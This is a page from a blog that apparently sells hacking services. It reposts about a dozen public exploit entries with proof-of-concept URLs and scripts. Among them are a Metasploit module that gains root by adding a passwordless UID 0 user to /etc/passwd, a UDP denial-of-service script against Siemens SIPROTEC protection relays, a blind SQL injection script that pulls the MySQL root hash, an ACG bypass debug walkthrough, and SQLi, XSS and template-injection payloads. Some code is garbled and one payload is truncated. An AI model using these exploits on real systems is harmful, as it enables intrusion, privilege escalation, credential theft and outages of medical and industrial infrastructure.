Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863561052

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
# Google Dork: MyChart® licensed from Epic Systems Corporation
# Date: 8/19/16
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
# Vendor Homepage: https://www.epic.com/software
# Software Link: N/A
# Version: N/A
# Tested on: Windows/Unix
# CVE : CVE-2016-6272

Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."

The MyChart software contains an X-Path injection due to the lack of sanitization for the GE parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.

EPIC was quick to respond to contact and patch the vulnerability in MyChart.

Below are two proof of concepts:

Proof of concept 1:

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)

Proof of concept 2 (operations):

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE
HireHackking 
Background:

To implement ACG (https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution/#VM4y5oTSGCRde3sk.97), Edge uses a separate process for JIT compiling. This JIT Process is also responsible for mapping native code into the requesting Content Process.

In order to be able to write JITted (executable) data into the Content Process, JIT Process does the following:

1. It creates a shared memory object using CreateFileMapping()
2. It maps it into Content Process as PAGE_EXECUTE_READ and in the JIT proces as PAGE_READWRITE using MapViewOfFile2(). At this point the memory is reserved, but not yet committed.
3. When individual pages need to be written to they are first allocated from the region in step 2 using VirtualAllocEx(). This also marks the memory as committed.

The issue:

If a content process is compromised and the content process can predict on which address JIT process is going to call VirtualAllocEx() next (note: it is fairly predictable), content process can:

1. Unmap the shared memory mapped above above using UnmapViewOfFile()
2. Allocate a writable memory region on the same address JIT server is going to write and write an soon-to-be-executable payload there.
3. When JIT process calls VirtualAllocEx(), even though the memory is already allocated, the call is going to succeed and the memory protection is going to be set to PAGE_EXECUTE_READ. 

Note #1: The content written in step 2 is going to survive the memory protection change.
Note #2: JIT server is going to write the JITted payload into its own "side" of the shared memory, so the content in the Content Process is not going to get immediately overwritten.

See the debug log below for a demonstration.

Debug log:

Let's attach one instance of WinDBG to JIT process and another to a Content Process.

Let's also verify that ACG is indeed applied for the Content Process. We can do this using Get-ProcessMitigation PowerShell command. See the output in the screenshot (note the "BlockDynamicCode: ON" field).

Now, in JIT Process, let's set a breakpoint on VirtualAllocEx() and wait.

0:020> bp kernelbase!virtualallocex
0:020> g

Soon the breakpoint is hit.

Breakpoint 0 hit
KERNELBASE!VirtualAllocEx:
00007fff`5590e170 4883ec38        sub     rsp,38h

We can examine the call stack to see where we are - we see we are in the Encode phase of ServerRemoteCodeGen() which is a function that Content Process calls on the JIT server when it wants to JIT a function or a loop body.

0:011> k
 # Child-SP          RetAddr           Call Site
00 000000c2`48cfcfe8 00007fff`4dff3104 KERNELBASE!VirtualAllocEx
01 000000c2`48cfcff0 00007fff`38752dcd EShims!NS_ACGLockdownTelemetry::APIHook_VirtualAllocEx+0x14
02 000000c2`48cfd030 00007fff`38752a16 chakra!Memory::PreReservedSectionAllocWrapper::Alloc+0xd5
03 000000c2`48cfd0b0 00007fff`3875233e chakra!Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper>::AllocDecommitPages<BVStatic<272>,1>+0xea
04 000000c2`48cfd150 00007fff`38752464 chakra!Memory::PageAllocatorBase<Memory::PreReservedSectionAllocWrapper,Memory::SegmentBase<Memory::PreReservedSectionAllocWrapper>,Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper> >::TryAllocDecommittedPages<1>+0x8e
05 000000c2`48cfd210 00007fff`38751e7a chakra!Memory::PageAllocatorBase<Memory::PreReservedSectionAllocWrapper,Memory::SegmentBase<Memory::PreReservedSectionAllocWrapper>,Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper> >::SnailAllocPages<1>+0x4c
06 000000c2`48cfd2d0 00007fff`38751488 chakra!Memory::CustomHeap::CodePageAllocators<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::AllocPages+0x72
07 000000c2`48cfd340 00007fff`38751210 chakra!Memory::CustomHeap::Heap<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::AllocNewPage+0x68
08 000000c2`48cfd3c0 00007fff`38750e14 chakra!Memory::CustomHeap::Heap<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::Alloc+0x9c
09 000000c2`48cfd470 00007fff`38750cae chakra!EmitBufferManager<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper,CriticalSection>::NewAllocation+0x58
0a 000000c2`48cfd500 00007fff`388599dc chakra!JITOutput::RecordOOPNativeCodeSize+0x8e
0b 000000c2`48cfd590 00007fff`388a5506 chakra!Encoder::Encode+0x9dc
0c 000000c2`48cfd710 00007fff`389904e5 chakra!Func::TryCodegen+0x356
0d 000000c2`48cfdfb0 00007fff`3877c00e chakra!Func::Codegen+0xed
0e 000000c2`48cfe3e0 00007fff`3877be54 chakra!<lambda_869fb2da08ff617a0f58153cb1331989>::operator()+0x166
0f 000000c2`48cfe500 00007fff`3877bde2 chakra!ServerCallWrapper<<lambda_869fb2da08ff617a0f58153cb1331989> >+0x54
10 000000c2`48cfe550 00007fff`3877bd85 chakra!ServerCallWrapper<<lambda_869fb2da08ff617a0f58153cb1331989> >+0x4e
11 000000c2`48cfe5c0 00007fff`57006d13 chakra!ServerRemoteCodeGen+0x75
12 000000c2`48cfe630 00007fff`57069390 RPCRT4!Invoke+0x73
13 000000c2`48cfe690 00007fff`56f93718 RPCRT4!Ndr64StubWorker+0xbb0
14 000000c2`48cfed40 00007fff`56fb73b4 RPCRT4!NdrServerCallNdr64+0x38
15 000000c2`48cfed90 00007fff`56fb654e RPCRT4!DispatchToStubInCNoAvrf+0x24
16 000000c2`48cfede0 00007fff`56fb6f84 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x1be
17 000000c2`48cfeeb0 00007fff`56fc0693 RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x154
18 000000c2`48cfef50 00007fff`56fc1396 RPCRT4!LRPC_SCALL::DispatchRequest+0x183
19 000000c2`48cff030 00007fff`56fbd11e RPCRT4!LRPC_SCALL::HandleRequest+0x996
1a 000000c2`48cff140 00007fff`56fbe843 RPCRT4!LRPC_ADDRESS::HandleRequest+0x34e
1b 000000c2`48cff1f0 00007fff`56fecc58 RPCRT4!LRPC_ADDRESS::ProcessIO+0x8a3
1c 000000c2`48cff330 00007fff`594665ae RPCRT4!LrpcIoComplete+0xd8
1d 000000c2`48cff3d0 00007fff`594aeed9 ntdll!TppAlpcpExecuteCallback+0x22e
1e 000000c2`48cff450 00007fff`5946471c ntdll!TppDirectExecuteCallback+0xb9
1f 000000c2`48cff4c0 00007fff`57ea1fe4 ntdll!TppWorkerThread+0x47c
20 000000c2`48cff850 00007fff`5949ef91 KERNEL32!BaseThreadInitThunk+0x14
21 000000c2`48cff880 00000000`00000000 ntdll!RtlUserThreadStart+0x21

If we examine the registers we see the second param is 000002854f18c000 - this is the address VirtualAllocEx() is attempting to allocate.

0:011> r
rax=0000000040000010 rbx=000002854f18c000 rcx=0000000000000724
rdx=000002854f18c000 rsi=0000000000000008 rdi=0000024038924de0
rip=00007fff5590e170 rsp=000000c248cfcfe8 rbp=0000024038924fe8
 r8=0000000000001000  r9=0000000000001000 r10=0000000000000001
r11=0000000000000007 r12=000002854f18c000 r13=0000000000000000
r14=000000000000000c r15=0000000000000000

Let's leave the JIT Process alone for a while and move into the Content Process. Let's examine the memory around address 000002854f18c000 using !vadump:

BaseAddress:       000002854f100000
RegionSize:        0000000000017000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f117000
RegionSize:        0000000000001000
State:             00001000  MEM_COMMIT
Protect:           00000001  PAGE_NOACCESS
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f118000
RegionSize:        0000000000074000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f18c000
RegionSize:        0000000000004000
State:             00002000  MEM_RESERVE
Type:              00040000  MEM_MAPPED

BaseAddress:       000002854f190000
RegionSize:        0000000000010000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00040000  MEM_MAPPED

We see some executable memory regions starting from 000002854f100000 which happens to be the base address of the shared memory in the Content Process. Let's unmap it.

0:084> r rip=kernelbase!unmapviewoffile
0:084> r rcx=000002854f100000

After unmapping it, let's allocate the desired address and set it to PAGE_READWRITE so that we can write to it.

0:084> r rip=kernelbase!virtualalloc
0:084> r rcx=000002854f18c000 # desired address
0:084> r rdx=1000 # size
0:084> r r8=3000 # MEM_RESERVE | MEM_COMMIT
0:084> r r9=4 # PAGE_READWRITE

After VirtualAlloc() finishes, we can see it returned 000002854f180000

0:084> r rax
rax=000002854f180000

The returned address is a bit lower than the one we requested, but it doesn't matter since the allocated region is also going to be larger than we requested so it's going to cover the desired address. Let's take a look at the memory map again:

BaseAddress:       000002854f100000
RegionSize:        0000000000080000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

BaseAddress:       000002854f180000
RegionSize:        000000000000d000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE

BaseAddress:       000002854f18d000
RegionSize:        000000000ff73000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

We can see that at address 000002854f180000 there is a region of size 000000000000d000 that has PAGE_READWRITE access. Since we can now write to this address, let's do it:

0:084> ea 000002854f18c000 "ACG bypass"

Now, let's go back to the JIT Server process and let VirtualAllocEx() finish. Once it does, let's go back into the Content Process and examine the memory again:

BaseAddress:       000002854f100000
RegionSize:        0000000000080000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

BaseAddress:       000002854f180000
RegionSize:        000000000000c000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE

BaseAddress:       000002854f18c000
RegionSize:        0000000000001000
State:             00001000  MEM_COMMIT
Protect:           00000010  PAGE_EXECUTE
Type:              00020000  MEM_PRIVATE

BaseAddress:       000002854f18d000
RegionSize:        000000000ff73000
State:             00010000  MEM_FREE
Protect:           00000001  PAGE_NOACCESS

We can now see some changes, specifically at address 000002854f18c000 there is now an executable memory region (PAGE_EXECUTE). Now we just need to make sure the content we wrote earlier is still there.

0:084> da 000002854f18c000
00000285`4f18c000  "ACG bypass"

That's it. We now have an executable page with the content we control, thus bypassing ACG.

A screenshot of WinDBG showing this final step is attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44096.zip
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABRT raceabrt Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on Fedora systems with
        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
        as the crash handler.

        A race condition allows local users to change ownership of arbitrary
        files (CVE-2015-3315). This module uses a symlink attack on
        '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
        then adds a new user with UID=0 GID=0 to gain root privileges.
        Winning the race could take a few minutes.

        This module has been tested successfully on ABRT packaged version
        2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop
        19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64.

        Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy', # Discovery and C exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'DisclosureDate' => 'Apr 14 2015',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'References'     =>
        [
          [ 'CVE', '2015-3315' ],
          [ 'EDB', '36747' ],
          [ 'BID', '75117' ],
          [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ],
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],
          [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],
          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],
          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],
          [ 'URL', 'https://access.redhat.com/articles/1415483' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]
        ]
    ))
    register_options(
      [
        OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),
        OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  def base_dir
    datastore['WritableDir']
  end

  def timeout
    datastore['TIMEOUT']
  end

  def check
    if cmd_exec('lsattr /etc/passwd').include? 'i'
      vprint_error 'File /etc/passwd is immutable'
      return CheckCode::Safe
    end

    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
      vprint_error 'System is NOT configured to use ABRT for crash reporting'
      return CheckCode::Safe
    end
    vprint_good 'System is configured to use ABRT for crash reporting'

    if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'
      vprint_error "Directory '/var/spool/abrt' exists. System has been patched."
      return CheckCode::Safe
    end
    vprint_good 'System does not appear to have been patched'

    unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'
      vprint_error "Directory '/var/tmp/abrt' does NOT exist"
      return CheckCode::Safe
    end
    vprint_good "Directory '/var/tmp/abrt' exists"

    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
      vprint_error 'abrt-ccp service NOT running'
      return CheckCode::Safe
    end
    vprint_good 'abrt-ccpp service is running'

    abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\s+/)[1]
    unless abrt_version.blank?
      vprint_status "System is using ABRT package version #{abrt_version}"
    end

    CheckCode::Detected
  end

  def upload_and_chmodx(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    cmd_exec "chmod +x '#{path}'"
    register_file_for_cleanup path
  end

  def exploit
    if check != CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    @chown_file = '/etc/passwd'

    if datastore['USERNAME'].blank?
      @username = rand_text_alpha rand(7..10)
    else
      @username = datastore['USERNAME']
    end

    # Upload Tavis Ormandy's raceabrt exploit:
    # - https://www.exploit-db.com/exploits/36747/
    # Cross-compiled with:
    # - i486-linux-musl-cc -static raceabrt.c
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'
    fd = ::File.open path, 'rb'
    executable_data = fd.read fd.stat.size
    fd.close

    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    upload_and_chmodx executable_path, executable_data

    # Change working directory to base_dir
    cmd_exec "cd '#{base_dir}'"

    # Launch raceabrt executable
    print_status "Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..."
    output = cmd_exec "#{executable_path} #{@chown_file}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }

    # Check if we own /etc/passwd
    unless cmd_exec("[ -w #{@chown_file} ] && echo true").include? 'true'
      fail_with Failure::Unknown, "Failed to own '#{@chown_file}'"
    end

    print_good "Success! '#{@chown_file}' is writable"

    # Add new user with no password
    print_status "Adding #{@username} user to #{@chown_file} ..."
    cmd_exec "echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}"

    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    # Execute payload executable
    vprint_status 'Executing payload...'
    cmd_exec "/bin/bash -c \"echo #{payload_path} | su - #{@username}&\""
  end

  def on_new_session(session)
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
    end

    # Reinstate /etc/passwd root ownership and remove new user
    root_owns_passwd = false
    new_user_removed = false

    if session.type.to_s.eql? 'meterpreter'
      # Reinstate /etc/passwd root ownership
      session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""

      # Remove new user
      session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""

      # Wait for clean up
      Rex.sleep 5

      # Check root ownership
      passwd_stat = session.fs.file.stat(@chown_file).stathash
      if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
        root_owns_passwd = true
      end

      # Check for new user in /etc/passwd
      passwd_contents = session.fs.file.open(@chown_file).read.to_s
      unless passwd_contents.include? "#{@username}:"
        new_user_removed = true
      end
    elsif session.type.to_s.eql? 'shell'
      # Reinstate /etc/passwd root ownership
      session.shell_command_token "chown root:root #{@chown_file}"

      # Remove new user
      session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"

      # Check root ownership
      passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
      if passwd_owner.to_s.include? 'root'
        root_owns_passwd = true
      end

      # Check for new user in /etc/passwd
      passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
      unless passwd_user.to_s.include? "#{@username}:"
        new_user_removed = true
      end
    end

    unless root_owns_passwd
      print_warning "Could not reinstate root ownership of #{@chown_file}"
    end

    unless new_user_removed
      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
    end
  rescue => e
    print_error "Error during cleanup: #{e.message}"
  ensure
    super
  end
end
HireHackking 
# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)

# Date: 14-02-2018

# Exploit Author: Frank Spierings

# Vendor Homepage:
https://www.redhat.com/en/technologies/jboss-middleware/application-platform/get-started

# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/

# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19

# Tested on: Red Hat Enterprise Linux Server release 7.4 |

# CVE : CVE-2018-1041



This is a very easy Denial of Service exploit. The target only requires 4
null bytes: `\x00\x00\x00\x00`.

The CPU will instantly spike after receiving this payload.



printf "\x00\x00\x00\x00" | nc <target> <port = 4447|9999>

`printf "\x00\x00\x00\x00" | nc 127.0.0.1 4447`
HireHackking 
# Exploit Title: TV - Video Subscription - Authentication Bypass
# Dork: N/A
# Date: 2018-02-14
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/tv-video-subscription/13966427?s_rank=1677
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any
authentication.
# # # # #
# Proof of Concept :

1) Go to login page .

2) Username : anything@anything.anything
    Password : ' or 0=0 #
HireHackking 
# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
# Date: 14.02.2018
# Exploit Author: M. Can Kurnaz
# Contact: https://twitter.com/0x43414e
# Vendor Homepage: https://www.siemens.com
# Version: All devices that include the EN100 Ethernet module version V4.24 or prior.
# Tested on: Siemens SIPROTEC 4 (multiple versions < V4.25).
# CVE : CVE-2015-5374
# Vulnerability Details: 
# https://www.cvedetails.com/cve/CVE-2015-5374/
# https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

#!/usr/bin/env python

import socket
import sys

print('CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service')

if len(sys.argv) < 2:
	print('Usage: ' + sys.argv[0] + ' [target]')
	sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) 

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 50000))

print('Done, say goodbye!')
HireHackking 
#!/usr/env/python
"""
Application UserSpice PHP user management
Vulnerability UserSpice <= 4.3 Blind SQL Injection exploit
URL https://userspice.com
Date 1.2.2018
Author Dolev Farhi

About the App:
What makes userspice different from almost any other PHP User Management
Framework is that it has been designed from the
beginning to get out of your way so you can spend your time working on
your project

About the vulnerability:
Unsanitized input passed to removePermission parameter.
"""

import requests
import string
import sys

from bs4 import BeautifulSoup

userspice_host = '10.0.0.16'
userspice_user = 'admin'
userspice_pass = 'password'
userspice_login_url = 'http://%s//users/login.php' % userspice_host
userspice_vuln_url = 'http://%s/users/admin_page.php?id=75' %
userspice_host
guess_chars = string.ascii_lowercase + string.ascii_uppercase +
string.digits + string.punctuation


banner = """
-------------------------------------------------------
| userSpice <= 4.3 Blind SQL Injection Vulnerability" |
-------------------------------------------------------
"""

login_data = {
'dest':'',
'username':userspice_user,
'password':userspice_pass
}

payload = {
'process':'1',
'removePermission[]':'1',
'private':'Yes',
'changeTitle':''
}

s = requests.session()

def getCSRF(url):
req = s.get(url).text
soup = BeautifulSoup(req, "lxml")
csrf = soup.find('input', {"name" : "csrf"})
csrf_token = csrf['value']
return csrf_token

login_data_csrf = getCSRF(userspice_login_url)
login_data['csrf'] = login_data_csrf
req = s.post(userspice_login_url, data=login_data)

if 'login failed' in req.text.lower():
print('Login failed, check username/password')
sys.exit(1)

payload_data_csrf = getCSRF(userspice_vuln_url)
payload['csrf'] = payload_data_csrf
print(banner)
print('[+] Running...')
print('[+] Obtaining MySQL root hash... this may take some time.')
password = ""
for i in range(0, 61):
for c in guess_chars:
payload_data_csrf = getCSRF(userspice_vuln_url)
payload['csrf'] = payload_data_csrf
injection = "5); SELECT 1 UNION SELECT IF(BINARY
SUBSTRING(password,{0},1)='{1}',BENCHMARK(3000000,SHA1(1)),0) Password
FROM mysql.user WHERE User = 'root'#;".format(i, c)
payload['removePermission[]'] = injection
req = s.post(userspice_vuln_url, data=payload).elapsed.total_seconds()
if float(req) 0.6:
password += c
print('[+] %s' % password)
else:
pass

print('done')
sys.exit(0)
HireHackking 
Vulnerability details:
# Exploit Title: Twig <2.4.4 Server side template injection 
# Date: 02/15/2018
# Exploit Author: JameelNabbo
# Author website: www.jameelnabbo.com
# Vendor Homepage: https://twig.symfony.com 
# Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation
# Version: < 2.4.4
# Tested on: MAC OSX

1.Description:
Twig is a modern php template engine  which compile templates down to plain optimized PHP code, Twig <2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values “Normal integer or normal string", depends on the vulnerable application, which takes deferent params by GET or POST.

Example: by injecting this in a search param  http://localhost/search?search_key={{4*4}} <http://localhost/search?search_key=%7B%7B4*4%7D%7D>         Output: 16


2. POC:
http://localhost/search?search_key={{4*4}} 
OUTPUT: 4 

http://localhost/search?search_key={{ls}} 
OUTPUT: list of files/directories etc….
HireHackking 
# Exploit Title: Joomla! Component SIGE version <= 3.2.3 Cross-site Scripting
# Date: 15-02-2018
# Software Link: https://downloads.kubik-rubik.de/joomla-extensions/plg_sige_v3.2.3.zip
# Exploit Author: Alwin Peppels
# Website: www.onvio.nl
# CVE: CVE-2017-16356
# Category: webapps

1. Description
Kubik-Rubik Simple Image Gallery Extended (SIGE) contains an XSS in the
'print.php' file.
Insufficient sanitization of the 'caption' URL parameter allows injection
of Javascript into the page.
In versions <= 3.2.0 the 'name' and 'img' parameters are vulnerable as well.
Google dork: inurl:plugin_sige/print.php

The version of the SIGE plugin can be determined with this file:
[JOOMLA]/plugins/content/sige/sige.xml

2. Proof of Concept


 [JOOMLA]/plugins/content/sige/plugin_sige/print.php?img=x&caption=<img%20src=x%20onerror=alert(%27XSS%27)>

3. Solution:

Update to version 3.3.0
https://downloads.kubik-rubik.de/joomla-extensions/plg_sige_v3.3.0.zip
HireHackking 
# # # # 
# Exploit Title: Joomla! Component Advertisement Board 3.1.0 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://ordasoft.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/advertisement-board/
# Version: 3.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5982
# # # # 
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_advertisementboard&Itemid=132&task=show_rss_categories&catname=[SQL]
# 
# YWFhJyBPUiAoU0VMRUNUIDYwMDQgRlJPTShTRUxFQ1QgQ09VTlQoKiksQ09OQ0FUKEBAdmVyc2lvbiwoU0VMRUNUIChFTFQoNjAwND02MDA0LDEpKSksMHg3ZTdlN2UsZGF0YWJhc2UoKSxGTE9PUihSQU5EKDApKjIpKXggRlJPTSBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyBHUk9VUCBCWSB4KWEpLS0gSHRMQg==
# 
# # # #

Joomla! Component Advertisement Board v3.0.4
id parameter,v3.0.4 previously found.

https://www.exploit-db.com/exploits/41600
HireHackking 
# # # #
# Exploit Title: Joomla! Component DT Register 3.2.7 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.dthdevelopment.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/dt-register/
# Version: 3.2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6584
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_dtregister&task=edit&controller=category&id=[SQL]
# 
# JTMxJTIwJTIwJTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTUzJTY1JTZjJTY1JTYzJTc0JTJhJTJmJTIwJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTNhJTNkJTMwJTJjJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTczJTY1JTZjJTY1JTYzJTc0JTJhJTJmJTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTY2JTcyJTZmJTZkJTJhJTJmJTI4JTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTYzJTZmJTZjJTc1JTZkJTZlJTczJTI5JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTc3JTY4JTY1JTcyJTY1JTJhJTJmJTQwJTNhJTNkJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTJjJTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTMzJTYzJTM2JTYzJTM2JTM5JTMzJTY1JTJjJTMyJTI5JTJjJTYzJTZmJTZjJTc1JTZkJTZlJTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTYxJTMzJTYxJTJjJTMyJTI5JTI5JTJjJTQwJTJjJTMyJTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM1JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM2JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM3JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM4JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM5JTMyJ